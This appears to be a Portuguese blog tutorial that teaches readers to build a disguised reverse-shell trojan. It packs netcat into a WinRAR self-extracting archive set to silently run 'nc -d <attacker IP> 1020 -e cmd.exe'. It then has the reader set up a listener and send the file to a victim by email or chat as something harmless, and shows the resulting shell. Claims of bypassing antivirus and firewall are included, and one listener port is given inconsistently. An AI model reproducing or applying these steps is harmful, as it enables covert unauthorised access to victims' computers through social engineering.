Com certeza uma das maiores dificuldades de se fazer um ataque por trojan, está na camuflagem do "bixo", pois os anti-vírus estão cada vez mais avançados, tornando a invasão por trojan algo muito difícil, pois para camuflar o mesmo teríamos que entender a fundo o a estrutura dos executáveis para windows, cabeçalhos PE, sem contar com programação em assembly para podermos editar o trojan usando um editores hexadecimais e debuggers, para deixá-lo invisível aos olhos do ainti-vírus, é claro que há exceções que você poderá editar apenas usando um explorador de PE como o ResourceHacker. Então, se você conhece todos os assuntos citados anteriormente, OK você com certeza poderá fazer com que seu trojan passe despercebido pelo anti-vírus, mas... e o Firewall? Qual será o truque para burla-lo? Bom, acho que já está na hora de te apresentar uma técnica de criação de trojan que faz o mesmo passar despercebido diante destes dois sistemas de proteção, esta técnica consiste em compactar o executável do NetCat (nc.exe) usando o WinRar e usando as opções de SFX do mesmo nos permitirá criar um trojan que faça conexão reversa, indetectável tanto aos olhos do anti-vírus como do firewall, Por que? Isso vou te explicar no decorrer deste artigo, Seja bem vindo!
O que é Conexão Reversa?
A conexão reversa é um tipo de invasão parecida com uma invasão por trojan, só que ao invés de o hacker se conectar ao alvo, como é feito tipicamente usando trojans, o alvo é quem se conecta ao hacker, dando-lhe total acesso a máquina invadida e fazendo com que bloqueios como firewalls sejam facilmente burlados e também é muito útil quando se quer invadir um computador que esteja na rede interna, já que a vítima é quem se conecta ao invasor.
Sobre o NetCat
O NetCat que é considerado pelos hackers o canivete suíço do TCP/IP, devido a sua incrível flexibilidade, com o NC(NetCat), podemos fazer desde uma simples conexão a um host até um brute force por wordlist, para quebrar senhas de um determinado serviço.
Você pode baixar o NetCat para Windows Clicando aqui.
A maioria das distros linux já vem com essa ferramenta pré-instalada, mas caso não venha você poderá baixa-lá Clicando aqui.
Sobre o WinRar
WinRAR parece nome de super-herói mas é o nome da versão para Windows do compactador de arquivos RAR.
O WinRar para Windows em Português do brasil pode ser baixado Clicando aqui.
Por que indetectável?
Primeiro vou explicar por que o trojan criado usando esta técnica é indetectável pelo o anti-vírus depois explico porque o mesmo é indetectável pelo firewall.
Anti-vírus:
Simples, nenhum anti-vírus, (pelo menos os do meu conhecimento) julgam o NetCat e o WinRar como programas nocivos. Por isso quando um anti-vírus faz uma varredura em um trojan feito usando esta técnica, ele só vai encontrar um executável criado pelo WinRar com o NetCat dentro dele compactado, e não vai emitir avisos pois trata-se de um programa inócuo (aos olhos do anti-vírus).
Firewall:
Como este trojan vai usar conexão reversa, nós não vamos ter que nos preocupar com firewalls porque a maioria dos firewall bloqueiam programas que queiram abrir portas, não os que simplesmente querem se conectar a uma determinada porta que já esteja aberta. Resumindo: Os firewalls se preocupam mais em proteger de fora pra dentro do que de dentro pra fora. Não entendeu? Então eu te explico melhor: Se você instala um trojan convencional que tente abrir uma porta na máquina da vítima para que o hacker se conecte, o firewall com certeza vai te bloquear, mas se você envia um trojan que vá se conectar a uma porta já aberta no seu computador (neste caso você é o invasor), dificilmente o firewall vai te bloquear.
Mãos a Obra!
Agora que já conhecemos estas duas magníficas ferramentas, vamos ao que realmente interessa, vamos iniciar a criação do nosso trojan, então siga o passo-a-passo abaixo, mas "use com moderação" Wink
Após baixar e descompactar o NetCat, abra a pasta onde você descompactou os arquivos do NetCat e compacte apenas o arquivo nc.exe usando o WinRar.
1. Abra o Arquivo compactado, clicando duas vezes sobre o mesmo e em seguida clique no botão SFX, e logo após em "Opções Avançadas de SFX".
Agora em Caminho para extração, informe o diretório onde você quer que o arquivo seja extraído, nos meus testes eu coloquei c:\windows\system32. No grupo Configurações do Programa e no campo Executar após a extração informe os seguintes parâmetros:
nc -d 192.168.28.2 1020 -e cmd.exe - isso fará com que o assim que executado o trojan se conecte a você.
Onde o IP (192.168.28.2) deverá ser substituído pelo seu, já que é a vítima que vai se conectar a você, e você também poderá substituir a porta (que está logo após o IP) por outra de sua preferência.
Agora clique na Aba Métodos
No Grupo de opções Método de espera, marque a opção Ocultar tudo, esta opção serve para que o NetCat seja executado em segundo plano, para que o alvo não perceba que está rodando um programa malicioso no seu computador. Logo em seguida no grupo de opções Métodos de Substituição, marque a opção Ignorar arquivos existentes para que o WinRar não nos dedure.
Clique na Aba Texto e ícone e escolha um ícone para o executável do seu trojan, clicando em Procurar.
Finalmente clique em OK nas duas janelas abertas e em seguida feixe o WinRar e Pronto! O seu trojan indetectável já está pronto, agora no seu computador vamos configurar o NetCat para que ele fique escutando em uma determinada porta (nos meus testes ou configurei a porta 1020). Veja abaixo como fazer isto:
Copei o arquivo nc.exe para a pasta c:\windows\system32
Vá no menu Iniciar >> Executar >> Digite "cmd" (sem as aspas)
E agora vamos deixar o NetCat na escuta na porta 1020 (lembre-se que tem que ser a que você configurou quando criava o trojan). No prompt de comando digite:
nc -l -n -p 2525 -vv
Em seguida ele ficará assim:
C:\Documents and Settings\Alison Robson\Desktop\nc111nt>nc -l -n -p 1020 -vv
listening on any 1020 ...
O NetCat já está na escuta, apenas esperando pela conexão do seu alvo. Agora só te resta enviar o trojan para o seu alvo por eMail, Chat, etc, como se fosse algo inofensivo e esperar que ele o execute, pois no mesmo instante em que o trojan é executado ele se conectará instantaneamente a você te dando de presente um belo Shell, como o da representação abaixo:
C:\Documents and Settings\Alison Robson\Desktop\nc111nt>nc -l -n -p 1020 -vv
listening on any 1020 ...
connect to [192.168.25.8] from (UNKNOWN) [127.0.0.1] 5402
Microsoft Windows XP versão 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>_
Pronto! Agora você já tem acesso total a máquina do seu alvo!!!
Bom, eu fico por aqui, espero que tenham gostado deste artigo (mas acho que pelo menos serviu pra você vê que não é tão complicado fazer um trojan indetectável), caso tenha ficado alguma dúvida o nosso fórum está ai para lhe servir da melhor maneira possível, também gostaria que vocês comentassem os meus artigos pois procuro cada vez mais me aperfeiçoar, para postar um melhor conteúdo para vocês, e os seus comentários seriam uma bela de uma ajuda. Até a próxima!
Tutorial Netcat
Assinar:
Postar comentários (Atom)
0 comentários:
Postar um comentário